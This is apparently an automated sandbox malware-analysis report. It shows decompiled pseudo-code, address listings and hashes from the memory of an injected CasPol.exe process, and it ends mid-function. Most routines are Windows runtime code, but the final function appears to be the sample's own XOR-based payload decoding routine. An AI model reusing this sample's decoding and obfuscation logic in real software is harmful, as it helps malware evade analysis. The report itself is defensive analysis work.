														E013C76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E01458938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E013BB150();
													}
													_t116 = E01456D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E013C75CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x14a8638; // 0x0
																	_t122 = L013C38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E013C76E2(_t154);
																			goto L41;
																		}
																	} else {
																		E013C76E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L013EFCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L013C70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E013EFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E013EFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E013EFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E013EFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E013EFD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x14a7b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x14a7b84 = _t75;
						_t73 = E013CEB70(_t134, 0x14a7b60);
						if( *0x14a7b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E013CFF60( *0x14a7b20);
							}
						}
						goto L5;
					}
				}
			}

















































                                                                        0x013efab0
                                                                        0x013efab2
                                                                        0x013efab3
                                                                        0x013efab4
                                                                        0x013efabc
                                                                        0x013efac0
                                                                        0x013efb14
                                                                        0x013efb17
                                                                        0x013efac2
                                                                        0x013efac8
                                                                        0x013efacd
                                                                        0x013efad3
                                                                        0x013efad3
                                                                        0x013efadd
                                                                        0x013efb18
                                                                        0x013efb1b
                                                                        0x013efb1d
                                                                        0x013efb1e
                                                                        0x013efb1f
                                                                        0x013efb20
                                                                        0x013efb21
                                                                        0x013efb22
                                                                        0x013efb23
                                                                        0x013efb24
                                                                        0x013efb25
                                                                        0x013efb26
                                                                        0x013efb27
                                                                        0x013efb28
                                                                        0x013efb29
                                                                        0x013efb2a
                                                                        0x013efb2b
                                                                        0x013efb2c
                                                                        0x013efb2d
                                                                        0x013efb2e
                                                                        0x013efb2f
                                                                        0x013efb3a
                                                                        0x013efb3b
                                                                        0x013efb3e
                                                                        0x013efb41
                                                                        0x013efb44
                                                                        0x013efb47
                                                                        0x013efb4a
                                                                        0x013efb4d
                                                                        0x013efb53
                                                                        0x0142bdcb
                                                                        0x0142bdcb
                                                                        0x013efb59
                                                                        0x013efb5b
                                                                        0x013efb5b
                                                                        0x013efb5e
                                                                        0x0142bdd5
                                                                        0x0142bdd8
                                                                        0x00000000
                                                                        0x0142bdda
                                                                        0x00000000
                                                                        0x0142bdda
                                                                        0x013efb64
                                                                        0x013efb64
                                                                        0x013efb64
                                                                        0x013efb67
                                                                        0x013efb6e
                                                                        0x013efb70
                                                                        0x013efb72
                                                                        0x00000000
                                                                        0x013efb78
                                                                        0x013efb7a
                                                                        0x013efb7a
                                                                        0x013efb7d
                                                                        0x013efb80
                                                                        0x0142bddf
                                                                        0x0142bde1
                                                                        0x00000000
                                                                        0x0142bde3
                                                                        0x00000000
                                                                        0x0142bde3
                                                                        0x013efb86
                                                                        0x013efb86
                                                                        0x013efb86
                                                                        0x013efb8b
                                                                        0x013efb90
                                                                        0x013efb92
                                                                        0x013efb94
                                                                        0x013efb9a
                                                                        0x013efb9b
                                                                        0x013efba1
                                                                        0x0142bde8
                                                                        0x0142bdeb
                                                                        0x0142bded
                                                                        0x0142beb5
                                                                        0x0142beb5
                                                                        0x0142bebb
                                                                        0x0142bebd
                                                                        0x0142bec3
                                                                        0x0142bed2
                                                                        0x0142bedd
                                                                        0x0142bedd
                                                                        0x0142beed
                                                                        0x00000000
                                                                        0x0142bdf3
                                                                        0x0142bdfe
                                                                        0x0142be06
                                                                        0x0142be0b
                                                                        0x0142be0d
                                                                        0x0142be0f
                                                                        0x0142be14
                                                                        0x0142be19
                                                                        0x0142be20
                                                                        0x0142be25
                                                                        0x0142be27
                                                                        0x0142be35
                                                                        0x0142be39
                                                                        0x0142be46
                                                                        0x0142be4f
                                                                        0x0142be54
                                                                        0x0142be56
                                                                        0x0142bef8
                                                                        0x0142bef8
                                                                        0x00000000
                                                                        0x0142be5c
                                                                        0x0142be5c
                                                                        0x0142be60
                                                                        0x00000000
                                                                        0x0142be66
                                                                        0x0142be66
                                                                        0x0142be7f
                                                                        0x0142be84
                                                                        0x0142be87
                                                                        0x0142be89
                                                                        0x0142be8b
                                                                        0x0142be99
                                                                        0x0142be9d
                                                                        0x0142bea0
                                                                        0x0142beac
                                                                        0x0142beaf
                                                                        0x0142beb1
                                                                        0x0142beb3
                                                                        0x0142beb3
                                                                        0x00000000
                                                                        0x0142bea2
                                                                        0x0142bea2
                                                                        0x00000000
                                                                        0x0142bea2
                                                                        0x0142be8d
                                                                        0x0142be8d
                                                                        0x0142be92
                                                                        0x00000000
                                                                        0x0142be92
                                                                        0x0142be8b
                                                                        0x0142be60
                                                                        0x0142be3b
                                                                        0x0142be3b
                                                                        0x0142be3e
                                                                        0x00000000
                                                                        0x0142be40
                                                                        0x0142be40
                                                                        0x0142be44
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0142be44
                                                                        0x0142be3e
                                                                        0x0142be29
                                                                        0x0142be29
                                                                        0x00000000
                                                                        0x0142be29
                                                                        0x0142be27
                                                                        0x00000000
                                                                        0x013efba7
                                                                        0x013efba7
                                                                        0x013efbab
                                                                        0x0142bf02
                                                                        0x013efbb1
                                                                        0x013efbb1
                                                                        0x013efbb8
                                                                        0x013efbbd
                                                                        0x013efbbd
                                                                        0x013efbbf
                                                                        0x013efbbf
                                                                        0x013efbc5
                                                                        0x013efbcb
                                                                        0x013efbf8
                                                                        0x013efbf8
                                                                        0x013efbfa
                                                                        0x00000000
                                                                        0x013efc00
                                                                        0x013efc00
                                                                        0x013efc03
                                                                        0x00000000
                                                                        0x013efc09
                                                                        0x013efc09
                                                                        0x013efc0f
                                                                        0x013efc15
                                                                        0x013efc23
                                                                        0x013efc23
                                                                        0x013efc25
                                                                        0x013efc27
                                                                        0x013efc75
                                                                        0x013efc7c
                                                                        0x013efc84
                                                                        0x00000000
                                                                        0x013efc29
                                                                        0x013efc29
                                                                        0x013efc2d
                                                                        0x013efc30
                                                                        0x0142bf0f
                                                                        0x00000000
                                                                        0x013efc36
                                                                        0x013efc38
                                                                        0x013efc3b
                                                                        0x013efc41
                                                                        0x0142bf17
                                                                        0x0142bf19
                                                                        0x0142bf48
                                                                        0x0142bf4b
                                                                        0x00000000
                                                                        0x0142bf1b
                                                                        0x0142bf22
                                                                        0x0142bf24
                                                                        0x0142bf26
                                                                        0x00000000
                                                                        0x0142bf2c
                                                                        0x0142bf37
                                                                        0x0142bf39
                                                                        0x0142bf3b
                                                                        0x00000000
                                                                        0x0142bf41
                                                                        0x0142bf41
                                                                        0x0142bf41
                                                                        0x0142bf41
                                                                        0x0142bf45
                                                                        0x00000000
                                                                        0x0142bf45
                                                                        0x0142bf3b
                                                                        0x0142bf26
                                                                        0x00000000
                                                                        0x013efc47
                                                                        0x013efc47
                                                                        0x013efc49
                                                                        0x013efcb2
                                                                        0x013efcb4
                                                                        0x013efcb6
                                                                        0x013efcdc
                                                                        0x013efcdc
                                                                        0x00000000
                                                                        0x013efcb8
                                                                        0x013efcc3
                                                                        0x013efcc5
                                                                        0x013efcc7
                                                                        0x00000000
                                                                        0x013efcc9
                                                                        0x013efcc9
                                                                        0x013efccd
                                                                        0x00000000
                                                                        0x013efccd
                                                                        0x013efcc7
                                                                        0x00000000
                                                                        0x013efc4b
                                                                        0x013efc4b
                                                                        0x013efc4e
                                                                        0x013efc4e
                                                                        0x013efc51
                                                                        0x013efc51
                                                                        0x013efc54
                                                                        0x013efc5a
                                                                        0x013efc5c
                                                                        0x013efc5f
                                                                        0x013efc61
                                                                        0x013efc63
                                                                        0x013efc65
                                                                        0x013efc67
                                                                        0x013efc6e
                                                                        0x013efc72
                                                                        0x013efc72
                                                                        0x013efc72
                                                                        0x013efc72
                                                                        0x013efc67
                                                                        0x013efc61
                                                                        0x00000000
                                                                        0x013efc5a
                                                                        0x013efc49
                                                                        0x013efc41
                                                                        0x013efc30
                                                                        0x013efc27
                                                                        0x013efc03
                                                                        0x013efbcd
                                                                        0x013efbd3
                                                                        0x013efbd9
                                                                        0x013efbdc
                                                                        0x013efbde
                                                                        0x013efc99
                                                                        0x013efc9b
                                                                        0x013efc9d
                                                                        0x013efcd5
                                                                        0x013efcd5
                                                                        0x013efc89
                                                                        0x013efc89
                                                                        0x00000000
                                                                        0x013efc9f
                                                                        0x013efc9f
                                                                        0x013efca3
                                                                        0x00000000
                                                                        0x013efca3
                                                                        0x00000000
                                                                        0x013efbe4
                                                                        0x013efbe4
                                                                        0x013efbe4
                                                                        0x013efbe4
                                                                        0x013efbe9
                                                                        0x013efbf2
                                                                        0x00000000
                                                                        0x013efbf2
                                                                        0x013efbde
                                                                        0x013efbcb
                                                                        0x013efbab
                                                                        0x013efc8b
                                                                        0x013efc8b
                                                                        0x013efc8c
                                                                        0x013efb80
                                                                        0x013efb72
                                                                        0x013efb5e
                                                                        0x013efc8d
                                                                        0x013efc91
                                                                        0x013efadf
                                                                        0x013efadf
                                                                        0x013efae1
                                                                        0x013efae4
                                                                        0x013efae7
                                                                        0x013efaec
                                                                        0x013efaf8
                                                                        0x013efb00
                                                                        0x013efb07
                                                                        0x013efb0f
                                                                        0x013efb0f
                                                                        0x013efb07
                                                                        0x00000000
                                                                        0x013efaf8
                                                                        0x013efadd

                                                                        Strings
                                                                        • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0142BE0F
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                                        • API String ID: 0-865735534
                                                                        • Opcode ID: 0bc2cb4fc1ec5b4312e85ee4f76e82cb37164b84b94af98cfaafd7a546dd0e81
                                                                        • Instruction ID: 399158ec6d775b013aa407f5eb4e77136940acd6f0016470e5ff87d436e0b485
                                                                        • Opcode Fuzzy Hash: 0bc2cb4fc1ec5b4312e85ee4f76e82cb37164b84b94af98cfaafd7a546dd0e81
                                                                        • Instruction Fuzzy Hash: B6A10471B007268BEB25DB6CC458BBAB7E8EF44728F14456EDA06CB7D1DB70D8418B80
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013B2D8A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 63%
                                                                        			E013B2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x14a5350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x14a7bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E013F97C0();
				}
				if( *0x14a79c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x14a79c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E013E1624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E013D7D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E0144FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E013F9520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E013EE18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L0140DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x14a6901;
								_push(_t109);
								_v52 = _t98;
								if( *0x14a6901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E013F9980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E013F95D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E013D7D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E013D7D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E01437016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E0144FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x14a5350;
							if(_t109 != 0x14a5350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E0144FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E01445720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                                                                        0x013b2d8a
                                                                        0x013b2d8a
                                                                        0x013b2d92
                                                                        0x013b2d96
                                                                        0x013b2d9e
                                                                        0x013b2da0
                                                                        0x013b2da3
                                                                        0x013b2da5
                                                                        0x013b2da8
                                                                        0x013b2dab
                                                                        0x013b2db2
                                                                        0x0140f9aa
                                                                        0x0140f9ab
                                                                        0x0140f9ae
                                                                        0x0140f9ae
                                                                        0x013b2db8
                                                                        0x013b2dc2
                                                                        0x0140f9b9
                                                                        0x0140f9be
                                                                        0x0140f9bf
                                                                        0x0140f9bf
                                                                        0x013b2dcf
                                                                        0x0140f9c9
                                                                        0x013b2dd5
                                                                        0x013b2dd5
                                                                        0x013b2dd5
                                                                        0x013b2dde
                                                                        0x013b2de1
                                                                        0x013b2e70
                                                                        0x013b2e72
                                                                        0x013b2e72
                                                                        0x013b2de7
                                                                        0x013b2deb
                                                                        0x013b2e7c
                                                                        0x013b2e83
                                                                        0x013b2e85
                                                                        0x013b2e8b
                                                                        0x013b2e8d
                                                                        0x013b2e92
                                                                        0x013b2e92
                                                                        0x013b2e85
                                                                        0x013b2df1
                                                                        0x013b2df7
                                                                        0x013b2df9
                                                                        0x013b2df9
                                                                        0x013b2dfc
                                                                        0x013b2dff
                                                                        0x013b2e02
                                                                        0x00000000
                                                                        0x013b2e05
                                                                        0x013b2e0c
                                                                        0x0140f9d9
                                                                        0x013b2e12
                                                                        0x013b2e12
                                                                        0x013b2e12
                                                                        0x013b2e1a
                                                                        0x0140f9e3
                                                                        0x0140f9e9
                                                                        0x0140f9f0
                                                                        0x0140f9f6
                                                                        0x0140f9f8
                                                                        0x0140f9f8
                                                                        0x0140f9f0
                                                                        0x013b2e23
                                                                        0x0140fa02
                                                                        0x0140fa03
                                                                        0x0140fa05
                                                                        0x0140fa06
                                                                        0x00000000
                                                                        0x013b2e29
                                                                        0x013b2e29
                                                                        0x013b2e2e
                                                                        0x013b2e34
                                                                        0x013b2e3e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013b2e44
                                                                        0x013b2e47
                                                                        0x013b2e4d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013b2e4f
                                                                        0x013b2e54
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013b2e5a
                                                                        0x013b2e5f
                                                                        0x013b2e9a
                                                                        0x013b2ea4
                                                                        0x013b2ea5
                                                                        0x013b2ea8
                                                                        0x013b2eaf
                                                                        0x013b2eb2
                                                                        0x013b2eb5
                                                                        0x0140fae9
                                                                        0x0140faeb
                                                                        0x0140faed
                                                                        0x0140faef
                                                                        0x0140faf7
                                                                        0x0140faf8
                                                                        0x0140fafd
                                                                        0x0140faff
                                                                        0x0140fb04
                                                                        0x0140fb04
                                                                        0x0140faff
                                                                        0x013b2ec0
                                                                        0x013b2ec4
                                                                        0x013b2ec6
                                                                        0x013b2ec8
                                                                        0x0140fb14
                                                                        0x0140fb18
                                                                        0x0140fb1e
                                                                        0x0140fb21
                                                                        0x0140fb21
                                                                        0x013b2ece
                                                                        0x013b2ece
                                                                        0x013b2ece
                                                                        0x013b2ed7
                                                                        0x013b2e61
                                                                        0x013b2e63
                                                                        0x0140fa6b
                                                                        0x0140fa71
                                                                        0x0140fa76
                                                                        0x0140fa78
                                                                        0x0140fa8a
                                                                        0x0140fa7a
                                                                        0x0140fa83
                                                                        0x0140fa83
                                                                        0x0140fa8f
                                                                        0x0140fa91
                                                                        0x0140fa97
                                                                        0x0140fa9d
                                                                        0x0140faa4
                                                                        0x0140faaa
                                                                        0x0140faaf
                                                                        0x0140fab1
                                                                        0x0140fac3
                                                                        0x0140fab3
                                                                        0x0140fabc
                                                                        0x0140fabc
                                                                        0x0140fac8
                                                                        0x0140facb
                                                                        0x0140fadf
                                                                        0x0140fadf
                                                                        0x0140facb
                                                                        0x0140faa4
                                                                        0x0140fa91
                                                                        0x013b2e6f
                                                                        0x013b2e6f
                                                                        0x013b2e5f
                                                                        0x0140fa13
                                                                        0x0140fa15
                                                                        0x0140fa17
                                                                        0x0140fa1f
                                                                        0x0140fa21
                                                                        0x0140fa22
                                                                        0x0140fa25
                                                                        0x0140fa28
                                                                        0x0140fa2f
                                                                        0x0140fa2f
                                                                        0x0140fa2a
                                                                        0x0140fa2a
                                                                        0x0140fa2a
                                                                        0x0140fa31
                                                                        0x0140fa34
                                                                        0x0140fa36
                                                                        0x0140fa3c
                                                                        0x0140fa3e
                                                                        0x0140fa41
                                                                        0x0140fa43
                                                                        0x0140fa45
                                                                        0x0140fa45
                                                                        0x0140fa41
                                                                        0x0140fa3c
                                                                        0x0140fa4a
                                                                        0x0140fa4f
                                                                        0x0140fa51
                                                                        0x0140fa53
                                                                        0x0140fa56
                                                                        0x0140fa5b
                                                                        0x0140fa5e
                                                                        0x00000000
                                                                        0x0140fa5e
                                                                        0x013b2e23

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: RTL: Re-Waiting
                                                                        • API String ID: 0-316354757
                                                                        • Opcode ID: 97b1c035617ccca8446d4d63fd0ecf80b6fb53100d9bba3e0dabadb5a78602c2
                                                                        • Instruction ID: 5b66c77619dd09d7f8b82aeaaabeff7da60a8c288a7991d23cbed8bb33bd48f1
                                                                        • Opcode Fuzzy Hash: 97b1c035617ccca8446d4d63fd0ecf80b6fb53100d9bba3e0dabadb5a78602c2
                                                                        • Instruction Fuzzy Hash: C4613871A006059FEB33DF6EC880BBF7BA4EB44318F14027AE615977E1D734A9458B81
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00401798 Relevance: 1.4, Strings: 1, Instructions: 178COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 53%
                                                                        			E00401798(void* __eax, void* __esi, intOrPtr _a4, signed int _a8, signed int* _a12) {
				intOrPtr _v8;
				signed int _v12;
				char _v54;
				short _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				signed char _t98;
				signed int _t100;
				signed int _t102;
				signed int _t103;
				void* _t106;
				intOrPtr _t107;
				char _t123;
				signed int _t134;
				intOrPtr _t136;
				signed int _t138;
				signed int _t140;
				void* _t141;
				signed char _t144;
				void* _t145;
				signed char _t148;
				signed int _t151;
				signed char _t153;
				signed char _t155;
				signed int _t157;
				intOrPtr _t159;
				void* _t160;
				void* _t161;
				void* _t162;
				signed int _t165;
				void* _t166;
				signed int* _t168;
				void* _t171;
				void* _t173;
				void* _t174;

				asm("adc edx, [edi]");
				_t98 = __eax + __esi;
				0xec8b();
				_t171 = _t173;
				_t174 = _t173 - 0x3c;
				if(_a4 != 0) {
					_t157 = _a8;
					if(_t157 != 0) {
						_push(__esi);
						_t168 = _a12;
						_t98 = _t168[0x7c] ^ _t168[0x78];
						_t134 =  &(_t168[0x78]);
						if(_t157 >= _t98) {
							_t100 = E00401D80();
							_t168[0x4f] = _t168[0x4f] ^  *_t134;
							_t140 = _t168[0x4f];
							_t168[3] = _t100;
							_t102 = _t157 / _t140;
							_t159 = 0;
							_t168[0x86] = _t134;
							_t136 = _a4;
							 *_t168 = _t102;
							_t103 = _t102 * _t140;
							_t168[0x68] = _t103;
							if(_t103 != 0) {
								do {
									_t159 = _t159 + 1;
									 *(_t159 + _t136 - 1) =  *(_t159 + _t136 - 1) ^  *(_t168[0x86]);
									_t155 =  *(_t168[0x86] + 1) ^  *(_t159 + _t136 - 1) & 0x000000ff;
									 *(_t159 + _t136 - 1) = _t155;
									_t148 =  *(_t168[0x86] + 2) ^ _t155;
									 *(_t159 + _t136 - 1) = _t148;
									 *(_t159 + _t136 - 1) =  *(_t168[0x86] + 3) ^ _t148;
								} while (_t159 < _t168[0x68]);
							}
							_t160 = 0;
							if(_t168[0x4f] != 1) {
								do {
									_t123 = L00401C40(1, _t168[0x4f] - 1);
									_t174 = _t174 + 8;
									_t145 = 0;
									while(_t123 !=  *((intOrPtr*)(_t168 + _t145 + 0x24))) {
										_t145 = _t145 + 1;
										if(_t145 <= _t160) {
											continue;
										} else {
											if(_t123 != 0) {
												 *((char*)(_t168 + _t160 + 0x24)) = _t123;
												_t160 = _t160 + 1;
											}
										}
										goto L12;
									}
									L12:
								} while (_t160 < _t168[0x4f] - 1);
							}
							asm("xorps xmm0, xmm0");
							_v64 = 0x5b27409e;
							_v60 = 0x405b5b5b;
